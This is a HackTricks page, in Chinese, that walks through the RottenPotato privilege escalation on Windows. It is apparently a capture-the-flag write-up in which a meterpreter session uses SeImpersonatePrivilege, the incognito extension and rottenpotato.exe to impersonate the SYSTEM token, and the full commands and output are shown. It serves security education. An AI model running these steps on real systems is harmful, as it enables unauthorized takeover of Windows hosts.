hacktricks/windows-hardening/windows-local-privilege-escalation/rottenpotato.md

RottenPotato

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• 你在一个网络安全公司工作吗？你想在HackTricks中看到你的公司广告吗？或者你想获得PEASS的最新版本或下载PDF格式的HackTricks吗？请查看订阅计划！

• 发现我们的独家NFTs收藏品The PEASS Family

• 获得官方PEASS和HackTricks周边产品

• 加入💬 Discord群组或电报群组，或者关注我在Twitter上的🐦@carlospolopm。

• 通过向hacktricks repo和hacktricks-cloud repo提交PR来分享你的黑客技巧。

这个页面的信息是从这篇文章中提取的。

服务账户通常具有特殊权限（SeImpersonatePrivileges），可以用于提升权限。

https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/

我不会详细介绍这个漏洞是如何工作的，上面的文章比我能解释得更好。

让我们使用meterpreter检查我们的权限：

meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege

太好了，看起来我们拥有执行攻击所需的权限。让我们上传 rottenpotato.exe。

回到我们的 meterpreter 会话中，我们加载 incognito 扩展。

meterpreter > use incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will beavailable
Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
NT SERVICE\SQLSERVERAGENT
NT SERVICE\SQLTELEMETRY
TALLY\Sarah

Impersonation Tokens Available
========================================
No tokens available

我们可以看到我们当前没有模拟令牌。让我们运行腐烂的土豆漏洞利用程序。

meterpreter > execute -f rottenpotato.exe -Hc
Process 3104 created.
Channel 2 created.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will beavailable
Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
NT SERVICE\SQLSERVERAGENT
NT SERVICE\SQLTELEMETRY
TALLY\Sarah

Impersonation Tokens Available
========================================
NT AUTHORITY\SYSTEM

我们需要快速模拟令牌，否则它将消失。

meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will beavailable
Call rev2self if primary process token is SYSTEM
[-] No delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

成功！我们已经获得了SYSTEM权限的shell，并且可以获取root.txt文件！

☁️ HackTricks云 ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• 你在一家网络安全公司工作吗？想要在HackTricks中看到你的公司广告吗？或者想要获得PEASS的最新版本或下载HackTricks的PDF吗？请查看订阅计划！

• 发现我们的独家NFTs收藏品——The PEASS Family

• 获得官方PEASS和HackTricks周边产品

• 加入💬 Discord群组或电报群组，或者关注我在Twitter上的🐦@carlospolopm。

• 通过向hacktricks仓库和hacktricks-cloud仓库提交PR来分享你的黑客技巧。